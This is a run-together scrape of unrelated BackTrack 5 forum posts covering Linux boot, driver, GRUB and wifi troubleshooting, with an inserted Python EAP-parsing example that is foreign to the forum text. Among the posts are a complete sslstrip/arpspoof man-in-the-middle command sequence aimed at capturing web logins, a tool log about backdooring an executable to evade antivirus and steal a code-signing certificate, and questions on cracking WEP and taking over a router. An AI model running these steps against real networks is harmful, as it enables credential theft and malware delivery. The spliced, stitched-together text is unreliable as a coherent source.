(and I did the hex edit already to allow it to run as root).
Can someone explain how to install something from the repos and how to get VLC to work/properly run it? Thanks a lot (I'm new to Linux).

We're in the middle of securing our webmail access. This is now just a connection over the internet towards a webserver; that webserver then requests a username and password, but this is done over a non-secure line (just HTTP). We were wondering if it's possible to intercept the username and password while sniffing on that specific port of the webmail server? Everyone is talking about SSL and secure access through VPN, or others. But as far as I know it's not possible to sniff a public webserver (e.g. webmail.xxx.xx) if you're not on the LAN of the host or the server. So pretty secure I guess? I've seen some documents about man-in-the-middle attacks, but again, this is when you're on the LAN of the host or server...

Does anyone have any ideas on how to test the security of that webmail provider?
or some great documents about that?

Now here is my issue: I have set my network adapters in bridge mode and tried everything to bring wifi up on BT5 but with no success. I have also copied iwlwifi-6000-ucode-9.221.4.1.tgz to /lib/firmware. I have restarted the wicd services but no wireless device is found. Can anyone help me with this issue, or is anyone experiencing the same problem?

I am currently having an issue with the "airmon-ng start wlan1" command. When I input this command, it does not list any interfaces. The weird thing is that when I input the command "airodump-ng wlan1" it works; it lists the BSSIDs.

This is the process which I used to get my card up and running:
ifconfig wlan1 down
iwconfig wlan1 mode monitor
ifconfig wlan1 up
airodump-ng wlan1

I did have to kill a few PIDs that were listed when I input the command "airmon-ng start wlan1".

So my main question is: why is my interface not being listed when I input the commands "airmon-ng" or "airmon-ng start wlan1"?

Greets peeps,
Roughly 7 or 8 months ago a rather interesting discussion appeared on the ol' Backtrack 4 forums on brute forcing. You can view that topic here, http://bit.ly/nB2diq. The author, CKing, is mostly (to my understanding) just conceptualizing a free-to-use online WPA brute forcer for Backtrack Forum members. Well, he mentions that cost would still be an issue, but that he'd fork up some preliminary hardware. This got me thinking... why not build a WPA Brute Forcing (or even brute forcing in general) distributed computing project. I think it'd be best not to focus on WPA only (especially since there's already a fatal flaw in TKIP I've been looking into... those of you wondering why tkiptun-ng doesn't work, I can help), it'd be especially nice if we could make a versatile platform that can run a number of brute force attacks.

It would be much like folding@home (http://bit.ly/9yJHvq for more) or other @home distributed projects. Distributed computing harnesses millions of volunteer computers as a parallel supercomputer. This means we'd need a willing audience. To help with this I'm thinking the client used to perform an attack would require that you've already donated something like 24 hours of GPU/CPU time. Lots of people with small servers could easily add a VM to handle additional volunteering, which would be nice. Someone may have to run a centralized server, which I'd be willing to sink a little "one-time-only" money into.

As far as the programming goes, I'm not too familiar with this sort of project, but Berkeley offers some tools like BOINC (the Berkeley Open Infrastructure for Network Computing; more here: http://bit.ly/aUbL0P). Clients would be supported on all OSs.

That's about as far as I've gotten. Right now I'm really just looking for reactions and maybe a few dedicated people with some basic (or expert) programming skills to contact me. You can email me directly @ jesusfreak2121@gmail.com

I just got my new BT5 ISO and I tried loading it on the USB pendrive that I just bought for it (16GB Freecom).
I made two partitions, 4GB and 16GB. The 4GB was the first and I formatted it to FAT32.
The other 12GB (still unused, planned to make that a TrueCrypt volume) I loaded the ISO on using UNetbootin.
All was successful; I booted my laptop and got the UNetbootin GRUB menu. It started booting, I saw a framebuffer, but then it stopped with an error.
I know the error is required to fix this. But I think that the flaw is there since I just have a 16GB pendrive. In the BIOS my laptop sees it as a hard drive and NOT as a removable disk.
When I did the exact same on an 8GB stick it was flawless.

So, can the issue be my 16GB stick or did I do something wrong? If I did something wrong, I'll reboot again, try to trigger the error and write it down on a piece of paper.
But I'll leave it for now since it's 2AM and I should get some sleep.

I've had sslstrip working pretty well, but I used to be able to see usernames and passwords in my sslstrip terminal. Now I can only see them in the sslstrip logs. Is there a specific command I need to use to see data on the fly?

I've managed to get my Late '08 MacBook Pro to dual boot BT5 with little or no problems at all. It does indeed support injection with its native wifi card and I've been cracking everything I can get my hands on.

However, I can't seem to have Airodump-ng display the power of scanned access points for some reason. Results shown are only "0" or "-1".

I tried to install TeamViewer 6 on my live USB BT5_x64, but when I run
Code:
root@bt:~# teamviewer6
it gives:
Code:
TeamViewer must not be executed as root!
and, when I try with:
Code:
root@bt:~# gedit /usr/bin/teamviewer6
oops, no conditional IF there :confused:

So, I will give the complete summary to download and install TeamViewer 6 x64 on BT5-GNOME-x64:
Code:
root@bt:~# wget http://www.teamviewer.com/download/teamviewer_linux_x64.deb
root@bt:~# dpkg -i teamviewer_linux_x64.deb
then edit the wrapper:
Code:
root@bt:~# gedit /opt/teamviewer/teamviewer/6/bin/wrapper
and search (Ctrl+f) for "TeamViewer must not be executed as root!"

I'm trying to crack a WEP key. There are no clients at the moment (hardly used network I suppose...). I've spoofed the MAC address, but can't get injection started, as I can't pick up a single IV.
Although I have a .cap file with 7 IVs, can I use it somehow to start the attack?
Here are screenshots to illustrate my situation.

Also, if RXQ is usually very high but sometimes drops very low, does it definitely mean that there is a client that is not in my range?

I'm attempting to gain super user access to my router. I own the router but I'm attempting to do this as if I didn't. The default password is the serial number. Ports 80 and 443 are the only two fully open, unfiltered ports. I've attempted to telnet (always disconnected) and I've attempted to TFTP and extract the configuration file. I'd like to save brute forcing the password for last, if possible.

What tools can be aimed at the router to gain access? Is there an attack that I can do to force it to reveal the serial number?

I have researched this into the ground and can't find a solid answer beyond brute forcing the router login.

Hi all. This is the first time I'm using this system, and the first thing I did was follow the steps to install the system, all good. Now when I log in I get the login screen, log in as root and type the command "startx", and the screen goes black and the caps-lock light turns on and off repeatedly. Nothing else happens and it does not enter the system. Can someone help me? I use BT5 64bit.

Hi, does BT5 work with this device? http://www.openpandora.org/ I noticed that there is an ARM version of BT5 and I was wondering if it works on this small PC, with packet injection and the other sweet stuff that BT5 has.

EAPeak is a Python-powered script that is meant to parse useful pieces of information for a security assessment of wireless networks that use the Extensible Authentication Protocol. It relies on the Scapy libraries to parse both PCap files and live network captures. Some highlights of the information that EAPeak can pull from wireless networks include:

EAP Types supported by Access Points

EAP Types supported by Clients

Client Usernames

LEAP MSChap v2 Challenge and Responses

EAPeak relies on the Scapy Community Repository libraries available here: http://hg.secdev.org/scapy-com
The community repository version of Scapy is required because the standard trunk does not contain the layers necessary to parse EAP frames to the extent that is necessary within EAPeak. SecureState has added the layers to the Scapy Community Repository to both parse and inject EAP-TTLS, EAP-TLS, PEAP and LEAP, and has extended the functionality of the standard EAP frame to include additional information, such as parsing Legacy NAK information. The additions to Scapy have laid a foundation that will facilitate injection of EAP frames, which will play a key role in additional features.
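For readers who want to see where the items listed above actually sit in the protocol, here is an added example (written for this page; it is not EAPeak's code and it does not use Scapy). It parses raw EAP packets per RFC 3748, i.e. the bytes that follow the EAPOL header in an 802.1X frame, and aggregates them the way an assessment report would: method types offered by the authenticator (Requests), types a client proposes instead (Legacy NAK), and the outer identity a client sends in the clear before any TLS tunnel exists. The sample frames are constructed inline so it runs offline; the "anonymous" check is a defender's heuristic for spotting clients that leak a real username as their outer identity, which is the usual mitigation for the Client Usernames item.

```python
"""Minimal EAP (RFC 3748) parser and summarizer; added example, not EAPeak code."""
import struct

EAP_CODES = {1: "Request", 2: "Response", 3: "Success", 4: "Failure"}

# Method types from the IANA EAP registry (only those relevant here).
EAP_TYPES = {
    1: "Identity",
    2: "Notification",
    3: "Legacy NAK",
    4: "MD5-Challenge",
    13: "EAP-TLS",
    17: "LEAP",
    21: "EAP-TTLS",
    25: "PEAP",
}

def parse_eap(frame: bytes) -> dict:
    """Parse one EAP packet. Raises ValueError on a malformed header or length."""
    if len(frame) < 4:
        raise ValueError("EAP header needs at least 4 bytes")
    code, identifier, length = struct.unpack("!BBH", frame[:4])
    # Length covers the whole EAP packet including the header and must fit in
    # what we actually have; any trailing bytes (padding) are ignored.
    if length < 4 or length > len(frame):
        raise ValueError(f"bad EAP length {length} for {len(frame)} byte frame")
    pkt = {"code": EAP_CODES.get(code, f"unknown({code})"), "identifier": identifier}
    if code in (3, 4):  # Success / Failure carry no Type field
        return pkt
    if length < 5:
        raise ValueError("Request/Response needs a Type byte")
    eap_type = frame[4]
    data = frame[5:length]
    pkt["type"] = EAP_TYPES.get(eap_type, f"unknown({eap_type})")
    if eap_type == 1 and code == 2:
        # Response/Identity: the outer identity, sent before any tunnel is up.
        pkt["identity"] = data.decode("utf-8", errors="replace")
    elif eap_type == 3:
        # Legacy NAK: each Type-Data byte is a method the peer would accept.
        pkt["nak_types"] = [EAP_TYPES.get(b, f"unknown({b})") for b in data]
    return pkt

def is_malformed(frame: bytes) -> bool:
    """True when parse_eap rejects the frame (used to show the length check)."""
    try:
        parse_eap(frame)
        return False
    except ValueError:
        return True

def summarize(frames) -> dict:
    """Aggregate parsed frames into the three categories EAPeak reports on."""
    report = {"ap_types": set(), "client_types": set(), "identities": set()}
    for frame in frames:
        pkt = parse_eap(frame)
        t = pkt.get("type")
        if pkt["code"] == "Request" and t not in (None, "Identity", "Notification"):
            report["ap_types"].add(t)
        if pkt["code"] == "Response":
            if t == "Legacy NAK":
                report["client_types"].update(pkt["nak_types"])
            elif t not in (None, "Identity", "Notification"):
                report["client_types"].add(t)
            if "identity" in pkt:
                report["identities"].add(pkt["identity"])
    # Heuristic: outer identities that are not "anonymous@realm" leak a username.
    report["exposed_identities"] = {
        i for i in report["identities"] if not i.split("@")[0].lower().startswith("anonymous")
    }
    return report

def build_eap(code: int, identifier: int, eap_type=None, data: bytes = b"") -> bytes:
    """Helper used only to construct the sample frames below."""
    body = b"" if eap_type is None else bytes([eap_type]) + data
    return struct.pack("!BBH", code, identifier, 4 + len(body)) + body

# Constructed sample exchange (not a real capture); realm names are placeholders.
SAMPLE_FRAMES = [
    build_eap(1, 1, 1),                             # Request/Identity from the AP
    build_eap(2, 1, 1, b"jdoe@corp.example"),       # Response/Identity: real username in clear
    build_eap(1, 2, 25, b"\x20"),                   # Request: AP offers PEAP (start flag set)
    build_eap(2, 2, 3, bytes([21, 17])),            # Legacy NAK: client wants EAP-TTLS or LEAP
    build_eap(1, 3, 21, b"\x20"),                   # Request: AP falls back to EAP-TTLS
    build_eap(2, 3, 1, b"anonymous@corp.example"),  # another client, anonymous outer identity
    build_eap(3, 4),                                # Success
]

if __name__ == "__main__":
    for f in SAMPLE_FRAMES:
        print(parse_eap(f))
    print(summarize(SAMPLE_FRAMES))
```

Run it as a script to print each parsed frame and the summary; in a real assessment the frames would come from the EAP payloads of captured EAPOL packets, and the exposed_identities set is the finding to report (fix: configure supplicants to send an anonymous outer identity).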

I have previously posted about issues with BT4 booting when there is a SOURCES folder present on the root of the drive. As it turns out, this is related to a bug in the version of apt-cdrom that is distributed with BT4 and BT5.

I encountered this issue because I was creating a multiboot USB drive with multiple distributions of Linux, along with UBCD4WIN, and an all-in-one Windows 7 installer image. The folder for the Windows 7 installation files can't be changed, it has to be named "SOURCES" and has to be on the root of the USB drive for it to install. Since the Win7 installer can't be changed, the only solution I was able to come up with was remastering the BT5 cd with updated apt* binaries.

Copy the new filesystem.squashfs file to the bt5 casper folder on your flash drive (overwrite the old one)

I imagine this will resolve itself as future versions of Backtrack are released, but for now this solution will work nicely for anyone attempting to cram multiple tools on one USB stick. If anyone is using the 32 bit bt5 KDE version (for broader compatibility), feel free to download the updated apt binaries from here, so you don't have to download kubuntu and extract them yourself.

I've read about a hundred posts on this problem and I've done everything imaginable to fix it. I'm frustrated to say the least. I can run the live CD fine with no problems at all, but when I do a hard drive install the problem is there. I load up fine and log in as root, but when I type startx and hit enter I just get a blank screen. The solution I'm using right now is to boot in recovery mode and then select resume normal boot, and it lets me in just fine. I have a Dell with Intel HD graphics and an i3. If you need more info just let me know. I'm kind of a noob at all this so just bear with me. Any help would be appreciated.

One of the three main issues I am dealing with is the Java plugin for Firefox. I need to pentest an app that is Java using BT programs including Burp Pro, but I have yet to get Java working. Tired of booting a Windows VM for everything that doesn't work in Linux.

Based on my searches, this is a common problem. I have tried 7 different solutions from this forum and others and none work. I have a 10.4, 64bit GNOME BT install. I have tried to get the Java plugin working on Ubuntu 11.x and other installs, but can't get it going. Has this been tweaked? Yes... but I have tried on generic installs as well.

Is there a solution that works like the Flash fix from sickness's post??? That's what I need for the Java plugin. Anyone, anyone??

What are the other two issues, you ask? SD card reader and keyboard lights... Shouldn't be this much work to get these to work... They should just work.

I have BT5 on an ASUS G73, 64bit GNOME. I have tried all versions of Firefox to no avail.
It just says not installed. Is this BackTrack related? No. But I need BT to test and Firefox is a part of that. Also figured that with the collective, someone has the answer for me...

I'm testing BackTrack 5 in VirtualBox 4.0.10. I installed it as a virtual disk.
I have a network adapter: RealTek PCIe GBE family controller.
My host is Windows 7 and my guest in VirtualBox is BT5.
However, when I set the network adapter to Bridged adapter, I see no wlan0 or eth0 in BT5.

Where is the trouble?

If I use the CommView wifi driver for the Atheros AR9285 (which has replaced my default wifi driver on my laptop) from my host, BT can access the internet.
So why in this case am I still not able to see any eth0 or wlan0 as I should?
Thx.

-Main hard drive (external) with a TrueCrypt volume: a normal TrueCrypt volume with some random data, and a hidden volume (which needs the keyfiles to mount) which contains the BackTrack 5 VirtualBox image.

My question is: do you guys think it's possible to mount my external hard drive on any PC (which has VirtualBox installed) and then load the BackTrack image (after authenticating with TrueCrypt) into VirtualBox?

My second question is: let's say I got BackTrack loaded in VirtualBox and I spoofed my MAC address. Once I connect to, let's say, a wireless network, will I connect with my spoofed (virtual) MAC address or with my host MAC address?

Yesterday I installed VMware Workstation 7.1.3 on BackTrack 5 32 bit. But it didn't seem to work the right way; it asks for the path to the kernel drivers.
Then I tried to install VirtualBox 3.1.6 and that worked well.

But now I wanted to install Windows Server 2008 in it, and that won't work.
I got a window with "Kernel driver not installed (rc=-1908), please install the virtualbox-ose-dkms package and execute 'modprobe vboxdrv' as root."

------------------------------
Deleting module version: 3.1.6
completely from the DKMS tree.
------------------------------
Done.
Loading new virtualbox-ose-guest-3.1.6 DKMS files...
First Installation: checking all kernels...
Building only for 2.6.38
Building for architecture i686
Building initial module for 2.6.38

Hi to everyone. I started using BT5 some time ago and I'm facing a problem that I can't solve myself. I have BackTrack installed on an old laptop with integrated VIA/S3G UniChrome IGP video. The problem is that in System > Preferences > Monitor it is described as "unknown" and offers only one resolution, 1600x1200@0.0 Hz, that works; any other resolution results in vertical stripes and desync of the picture. However, with 1600x1200 I can see only the top left corner of my monitor, which is really inconvenient.
My xorg.conf says "Monitor - generic, device - generic". I deleted it following one of the pieces of advice on the internet and nothing changed. I tried adding new modes to xrandr, but they all return a crtc error.
What should I do? Maybe reinstalling the system would help?
Thank you

When I am exploring things on the hard drive with the Dolphin file manager, sometimes it just crashes and my laptop freezes; all I can do is hold the power button and restart.... What is wrong, why is this? I have a syslog:

I am trying to boot from the bt5 Gnome 32bit installer on a Dell Latitude E6400, but I keep getting the same error (seen in picture). I have a 64bit and 32bit disk burned, both boot fine on my T60, so it is not the disk. I have changed all the security settings I could think of in the BIOS that could be blocking the installer, but it still gets stuck at this point. I am already running bt4 r2 dual boot with Win7 just fine, so I am not sure what is going on.

I've got a notebook with an Nvidia GT520M and Optimus technology.
I have installed the BT5 GNOME edition and, as is known, the default resolution is 1024x768 and I can't change it by configuring the xorg.conf file or by adding a new mode with xrandr.

Furthermore, I cannot install the Nvidia drivers from Nvidia's official site because of the Optimus technology; I think it first needs Intel's VGA drivers.
I tried a lot of driver packages I found in the repositories with no luck... Are there any drivers for Intel's VGA??

Or could someone tell me how to configure the xorg.conf file, because I did Google a lot and tried many things with no luck.
Also I tried these tutorials here a little, but I can't even find nvidia-kernel-dkms in the repositories, and if I download it manually I get errors...

Please, I would really appreciate it if someone tries to help me out.
Thanks in advance, a desperate BackTrack fan :P

I was setting up some soft-APs and comparing the various brands of RTL8187L chipsets: Alfa AWUS036H, GSky GS-27USB and FreeWiFiLink FL-10000G. I went looking for the latest drivers for Windows and found GSky and Alfa OK. FreeWiFiLink seems to be dodgy, and one of the search vectors led back here to this post: http://www.backtrack-linux.org/forum....html#post4833

This adapter seems to perform ok, not as good as the other 2, though the interesting thing is what was on the back!

So, I have a laptop, brand new, running a dual boot with Ubuntu and Windows 7. I've downloaded BackTrack 5, both GNOME and KDE, in ISO format. I have a USB flash drive, and when I put either one on it and choose to boot from my USB, all my computer says is that it can't find an operating system. Any help?

Hi guys, I am new to BackTrack 5. I have it installed side by side with my Windows.

I have managed to crack my old WEP router and my WPA, but I haven't learnt anything, just followed step by step tutorials and have no understanding of what the commands mean or do. I did a bit of reading on how to steal live session cookies but it's the same step by step guide. I have searched the forums but had no luck in finding some sort of "noob's guide to BackTrack".

Just need some sort of reading material to learn from.

How to install programs like WiFi Zoo or any program,
and what all the basic commands do in the terminal.

I have never used Linux before and I hear BackTrack isn't the best version to start off with, but I reckon if I start with the hardest I will learn more.

It's been a while since I used Backtrack. Anyway, I've recently moved to BT5 KDE on my laptop to give it a go. After installing it with my standard full HDD encryption using luks/lvm and adding a new normal user I decided to customize the installation a bit. Now I've been trying to get KDM to autostart at boot. Basically I've followed this HOW-TO, but I just can't get it to work.

"apt-get install kdm" said that kdm is already installed/newest version, and the file "/etc/init/kdm.conf" already has the "exec kdm" line at the bottom.

All I get is the standard console login prompt. I must be missing something.

Using UNetbootin, build a bootable USB drive with BT5. (Instructions can be found on the BackTrack wiki.)

Using F12 boot options boot off the USB drive into BT5 Live.

On boot you will see the default boot text and then the BT5 logo screen, and then the display will probably go blank.

Don't worry about the blank display. Wait about 2 minutes, then just blindly type "startx" and you should see activity on your USB drive. Within a few seconds you should see the BT5 loading screen; it will probably go black and lock up your mouse pointer. If you didn't see the loading screen after typing "startx" and the mouse lock, then reboot and try again. I had to reboot mine about 5 times till it got there.

Also, keep in mind during this process that the USB port on the left side of your M14x ALWAYS has power when plugged into the AC adapter, even when shutdown. So you may have to remove your USB drive to see it again in the boot list after hitting F12.

Ok, so after the mouse pointer lock with the black background, you will need to blindly type this:

You should now see the BT5 boot screen again and this time it shouldn't lockup and actually let you into Backtrack 5.

If you get a message saying: Do you want KDE to permanently forget about these devices? just check the "Do not ask again" box and click YES.

Run the "Install BackTrack" shortcut on the desktop to begin installing BT5. Go through the installation process, accepting most of the defaults as you would for a normal installation. Hint: if you're running Windows, just choose the option to run them side by side.

On the "Ready to Install" screen click the "Advanced..." button and choose your hard drive from the drop-down list. Mine was /dev/sda "ATA STXXXX (750.2GB)".

Click OK, then click Install, then Restart Now after the installation has finished.
Note: you may have to physically power off if the reboot hangs. (Remember to remove your USB drive.)

After the reboot you should now see the GRUB2 bootloader with a few options. By default you want the top entry or just let it time out and it will pick it for you.

Once BT5 has booted you should be at the login screen. Use the default root/toor user/pass to login. Then type

You should be able to boot into BT5, but you will notice that the screen resolution is stuck at a crappy 1024x768 and you have no options to change it or even use the external video ports (VGA, HDMI, etc).

Sooo.... Lets fix that.

Connect to the internet, either through Cat5 or wireless (wicd network manager). (I won't go into internet connection detail as you can find that info all over the forum.)

you are just changing "text" to "quiet" and "nomodset" to "i915.modset.modeset=1"

then hit ctrl-x to boot

Wait for BackTrack to boot and you should now see the pretty blue logon window. Log in using root/toor and see your new desktop resolution (1366x768). You will now notice, if you go to your display properties, that you have access to your VGA and HDMI ports too. I have tried this with my VGA and it works pretty well.

If your display works for you, make the changes permanent by editing the /etc/default/grub file with the changes above.

Note: Some desktop effects in BT may crash while using the new Intel drivers; this is normal as there really isn't a way to fully support the Optimus video yet. Just click continue on the crash and BT will automagically disable desktop effects.

OK, so why go through all of this?? Well, the reason is that the new Intel processors use a Sandy Bridge chipset, which on the M14x utilizes a combination of Intel and nVidia video. The problem is that there really aren't any Linux drivers out there that can combine the two cards to automatically swap between them. However, bumblebee is becoming very close to making this work. https://github.com/MrMEEE/bumblebee
This project is trying to fix the issues with Linux and Optimus video. You are more than welcome to install it and test it on your box, but after days of trying to make this work it seems there is an issue with bumblebee and the kernel; even though the install completes and I can see the nvidia X server, it never fixes my ability to use both cards or disable my nVidia. I have to give this guy credit as a lot of other people have had success with his installation. If anyone makes this work on their M14x please let me know, I would love to use it.

I have searched for a good while for a fix to get my brightness settings to adjust. They're all the way up right now and in low light it is really murder on my eyes. Display settings show no option to adjust and the Fn keys don't have an effect either. I have the exact same problem in Ubuntu 10.04 but I have a new kernel that is made for my laptop (Dell Inspiron 14R n4010) that fixes the problem and makes my Ubuntu partition work flawlessly. It's three .deb files that make this kernel up and since BackTrack 5 is made off of Ubuntu 10.04 I figured that I would try to install these with
Code:
dpkg -i file.deb
and they all install perfectly. I reboot, and my grub menu doesn't show anything different than before. Just my Ubuntu, Windows, and then BackTrack. I did run
Code:
update-grub
as well and checked in Synaptic to confirm that they were installed. My question is, can BackTrack use a different kernel and, if so, is there a conflict in using the same kernel on two different distros on the same machine?

I appreciate any help and just let me know what output y'all would need to see to help troubleshoot this. I would have included some but I don't know what output would give any help to this issue.

I have no idea what I'm doing wrong here. Everyone else on the internet seems to get this thing to work first try, no problem, but I've been at this for two nights now, followed dozens of subtly different directions, and the end result is always the same: Gmail, Facebook, etc. still have the HTTPS links intact and the sslstrip log files are empty, which proves that nothing was captured.

The commands I use are all taken directly from the sslstrip website:

echo 1 > /proc/sys/net/ipv4/ip_forward (for the record I've tried the variants where you put the 1 in "" and '')
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 (also tried 8080)
python sslstrip.py -w filenamehere.log (also tried it with the -a and -k commands, and -l 8080 when I used 8080 as the redirect port; I've also done it where I ran the setup.py file first)
arpspoof -i wlan0 -t 192.168.1.2 192.168.1.1 (also tried it without a target, and tried every single address I found on my network with no results; and yes, I'm sure wlan0 is my wireless adapter and that 192.168.1.1 is the router address since that's listed as the gateway when I do a route command, and it's the address I have to type in to get to the router administration page)

I've tried using my own machine as the victim machine and my phone (hooked up via wifi). In both cases every SSL page I visited still had SSL.

[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[-] Backdoor completed successfully. Payload is now hidden within a legit executable.
[*] UPX Encoding is set to ON, attempting to pack the executable with UPX encoding.
[!] UPX was not detected. Try configuring the set_config again.
[*] Digital Signature Stealing is ON, hijacking a legit digital certificate.

********************************************************
Do you want to create a Linux/OSX reverse_tcp payload
in the Java Applet attack as well?
********************************************************

Hello, I am attempting to install BackTrack 5 GNOME x64 onto a USB key containing GRUB2. I would like to be able to use the USB key to load multiple distributions of Linux and other various tools, which is why I chose GNOME as the bootloader.

Because I want to be able to boot ISO files from GRUB and have one large USB key with a bunch of useful tools, including BackTrack, a UNetbootin-burned ISO is not much use to me. I do not have difficulties creating one. I am looking specifically for a way to be able to chainload to GRUB or use GRUB with BackTrack.

menuentry "Grub4dos"{
linux /grub4dos/grub.exe
}
For convenience, here is the BackTrack 5 entry by itself:
Code:
menuentry "BackTrack 5" {
loopback loop /BT5-GNOME-64.iso
linux (loop)/casper/vmlinuz boot=casper iso-scan/filename=/BT5-GNOME-64.iso noeject noprompt splash --
initrd (loop)/casper/initrd.gz
}
Unfortunately, upon boot, after sitting on the splash screen for several seconds (no text, just the BT5 background), I eventually get "(initramfs) Unable to find a medium containing a live file system" and I get dropped into the Ubuntu minimalist shell. I would provide more information, however I do not know what information specifically to look for or is applicable here.

I attempted it, hoping I could chainload GRUB from syslinux somehow, however the USB drive does not boot (it simply black screens with a white blinking cursor and hangs the system). I did not get any error messages during the process, and a Linux OS recognizes the USB, it just will not boot (I have tested other USB boots on the system in question, including a UNetbootin of BackTrack which works fine).

Questions:

1) Is it possible to boot BackTrack directly from ISO from GRUB?
2) If it is not possible, what are my alternatives? Am I able to have a (preferably persistent) installation of BackTrack be loaded by GRUB in a different fashion?
3) I've considered using two partitions on my USB, one with BackTrack installed without a bootloader, the other the active boot partition with GRUB that has an entry for BackTrack. Is this possible, and a good alternative to using the ISO directly?

I'm a beginner. I have Windows 7, so I installed BT5 side by side with Windows. I have an internal wireless card (Atheros 9002WB-1NG) and when I tried to check the aircrack-ng injection test (aireplay-ng -9 wlan0) I get this:

ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make
sure RFMON is enabled: run 'airmon-ng start wlan0 <#>'
Sysfs injection support was not found either.
---
and this is what I get when I use dmesg:

Created live USB with GRUB2 and several different tools. The drive is formatted as fat32 and it works with other distributions of Linux loaded as ISO files [eg Ubuntu].

Attempting to add the BackTrack 5 ISO to be booted. Unfortunately, I get "(initramfs) Unable to find a medium containing a live file system" and I get dropped into the Ubuntu minimalist shell (after the BackTrack 5 splash is displayed for about 30 seconds).

menuentry "Grub4dos"{
linux /grub4dos/grub.exe
}
Is it possible to load BackTrack the way I am attempting? Where did I go wrong? If it's not possible, what are my alternatives for putting BackTrack on a multi-boot USB key?

Hi everyone, except dummy ones! :p
I have BT5 on VBox 4.0.10 and a TL-WN721N USB wifi adapter.
Unfortunately they don't like each other!
I googled the issue and found some solutions but none of them worked...

I have BT5 installed on a netbook. I am trying to share my wireless connection to my ethernet port so that I can connect other devices to my netbook.
I have tried many guides but nothing worked with BT5. I searched the forum but haven't found anything. Any advice?

Hi,
my aim was to make a multi-boot USB thumb drive with 3 primary partitions (all formatted with ext3). The first one is the boot partition, has a size of 4 GB and was created for BT5. This partition was called 'backtrack'.
I tried this on my notebook within an openSUSE 11.4 standard installation. I also followed this official tutorial: http://www.infosecramblings.com/back...changesnessus/
But this command
Code:
grub-install --no-floppy --root-directory=/mnt/bt5 /dev/sdb
told me this:
Code:
WARNING! You are trying to invoke the unsupported grub-install script
with a parameter. To really do this, call grub-install.unsupported.
You should rather call "yast2 bootloader" or create configuration files
appropriate for the intended target.
So, I thought 'OK, why not?' and I tried this command:
Code:
grub-install.unsupported --no-floppy --root-directory=/mnt/bt5 /dev/sdb
but this command failed too, with this error message:
Code:
Probing devices to guess BIOS drives. This may take a long time.
/usr/sbin/grub-install.unsupported: Zeile 444: /usr/sbin/grub-set-default: File or directory not found.
The file /mnt/bt5/boot/grub/stage1 not read correctly.
I have read the error message, but I did not understand what it wants to tell me. I did not try this command again; I just stopped after this error message. So please help me, I actually do not know what the problem is.

I bought a new laptop some days ago. But I think it's too new ;)
Every Linux distribution I try fails to boot properly. Near the end of the boot processes my screen just turns black and the laptop doesn't respond to anything.
I have been using Linux for some years now and normally I can figure it out when I come across something. But in this case even safe modes do not work.
The (relevant) specs:
It's an Asus N53SV
i7-2630QM
540M

I think it has something to do with Sandy Bridge and the Linux kernel.
I haven't tried to build my own, newer Linux kernel yet....

Hello, I am an IT security student new to Arch. I am currently trying to set up my Alfa AWUS051NH USB wireless adapter with my Arch desktop. I have it running somewhat, but not at the speeds I would like. I found on Alfa's website that the device can use either of two chipsets: Ralink RT2770 or RT2750. I thought iwconfig would tell me what chipset the device was using, but apparently not.

So I did a lsusb and got:

Code:
Bus 001 Device 002: ID 148f:2770 Ralink Technology, Corp. RT2770 Wireless Adapter
I look at iwconfig and see the bit rate changes anywhere from 5 to 150 Mbps at any given time. I have tried

Code:
iwconfig wlan0 rate 300
&
Code:
iwconfig wlan0 rate auto
But neither has any effect. I believe the issue is that the card can use the a/b/g/n standards and is not using 802.11n, which I believe is the only one that can do 300 Mbps. My router is broadcasting in 802.11n, by the way. I don't know how to force the device to use 802.11n.

So does anyone have any ideas, and can anyone answer some of my questions? I would very much appreciate it. If any commands need to be run for more information, I would be glad to do so.

mods: please merge this with the post from this morning.. after doing some research I realized that the original script was messed up.. thanks!

Copy and paste the code into a new file named flashcleaner or whatever you like.. then execute

Code:
chmod +x flashcleaner
then run it from within the directory it's located in by typing

Code:
./flashcleaner
enjoy!

Code:
#!/bin/bash

#Backtrack flash cleanup script
#by J0hnnyB14z3
#100% based on the backtrack how-to in the wiki found here http://www.backtrack-linux.org/wiki/index.php/Install_Flash_Player .. I take no credit for anything more than assembling the script and automating the process. Thanks to the folks who put the wiki together!

Fact:
First of all, you should root your Dell Streak 5. I have tried many methods to root the Dell Streak 5 but was unsuccessful. I nearly bricked my Streak. Fortunately, I re-flashed the recovery image and rescued my Streak.

Now, I would like to show you how to root your Streak by means of installing a custom ROM - SimpleStreak, which is developed by Spidia. The current SimpleStreak is 1.2 and is based on the stock ROM 2.2.2. It is the easiest way to do so. If you do so, your Streak cannot be unrooted and the warranty will be voided. The ROM will be SimpleStreak 1.2.

Installation of Back|Track 5 does not harm your Streak as it uses VNC to load the Back|Track 5 image.

aircrack-ng does not run properly as the interface is eth0 instead of wlan0. There is no monitor mode and no injection either.

I have been trying to install the NVIDIA driver for my card (GeForce 8600M GT) for the last two days. I have searched around but nothing seems to fix my problem. When I start the driver installer, it begins complaining that it doesn't find the kernel source tree and something. There is not really much to say about it, other than that I really need help and I hope someone on this forum is willing to help a newbie like me.

I downloaded the KDE version of BT and when I run "uname -r" it says "2.6.38". Please tell me if you need some more info about my system.

Using: nvidia-installer ncurses user interface
-> License accepted.
-> Installing NVIDIA driver version 275.09.07.
-> Performing CC sanity check with CC="cc".
-> Performing CC version check with CC="cc".
ERROR: Unable to find the kernel source tree for the currently running kernel.
Please make sure you have installed the kernel source files for your
kernel and that they are properly configured; on Red Hat Linux systems,
for example, be sure you have the 'kernel-source' or 'kernel-devel' RPM
installed. If you know the correct kernel source files are installed,
you may specify the kernel source path with the '--kernel-source-path'
command line option.
ERROR: Installation has failed. Please see the file
'/var/log/nvidia-installer.log' for details. You may find suggestions
on fixing installation problems in the README available on the Linux
driver download page at www.nvidia.com.

After the SSH video I decided to record the next one; these were initially just for my reference as I'm pretty forgetful, however g0tmi1k suggested I should publish them.

So first of all I looked at how to set up/install pyrit; it has been covered in the How-to section and this is where I got the commands from.
However I still recorded a video for it here: Installing pyrit in bt5 Blip.tv

There are other links at the bottom of the blog post for those who don't like blip.

Once pyrit was set up and had been benchmarked, I looked at cracking WPA.

This is the same as cracking WPA with any other program!

Firstly, it has to be your own router or you must have permission from the administrator.
Secondly, the key that you're cracking has to be inside the list or dictionary file.
If the password isn't in the dictionary file, the key will not be cracked.
Note that 'insecurepass' is different to 'Insecurepass'.
